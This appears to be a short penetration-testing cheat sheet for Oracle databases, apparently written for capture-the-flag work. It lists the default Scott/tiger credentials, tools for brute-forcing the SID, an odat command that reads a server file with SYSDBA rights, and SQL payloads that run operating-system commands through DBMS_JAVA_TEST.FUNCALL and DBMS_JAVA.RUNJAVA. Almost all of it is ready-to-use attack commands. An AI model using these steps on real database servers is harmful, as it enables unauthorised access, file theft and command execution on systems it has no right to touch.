ORACLE
Oracle / ODAT
Basic Credentials
Username --> Scott
Password --> tiger
Brute-force SID
Use:
odat
and itssidguesser
to bruteforce with a link providedUse metasploit and use
auxiliary(admin/oracle/sid_brute)
Use
sqlplus
to login with the creds orRead file with odat:
odat ctxsys -s <ip> -d XE -U SCOTT -P tiger --sysdba --getFile flag.txt
Command Execution
-- 10g R2, 11g R1 and R2: DBMS_JAVA_TEST.FUNCALL()
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
-- 11g R1 and R2: DBMS_JAVA.RUNJAVA()
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
References
Last updated